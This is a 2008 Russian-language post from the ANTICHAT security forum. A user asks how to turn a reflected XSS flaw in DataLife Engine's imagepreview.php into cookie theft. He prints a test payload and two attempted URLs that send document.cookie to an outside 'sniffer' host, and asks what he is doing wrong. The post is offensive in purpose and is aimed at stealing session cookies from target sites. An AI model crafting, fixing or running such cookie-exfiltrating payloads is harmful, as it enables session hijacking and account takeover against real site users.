Форум АНТИЧАТ - XSS в DataLife Engine. Обсуждение.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

XSS в DataLife Engine. Обсуждение.

02.08.2008, 13:12

Dr.Bodja

Познающий

Регистрация: 27.08.2006

Сообщений: 52

Провел на форуме:
338724

Репутация: 15

XSS в DataLife Engine. Обсуждение.

Есть уязвимость

Код HTML:

_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);

Нужно прилепить сниффер, чтобы куки на сниффер шли.

Пробывал так

Код HTML:

_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);

И так

Код HTML:

_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));

Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

Зарание спасибо за помощь.

С ув. DrBodja.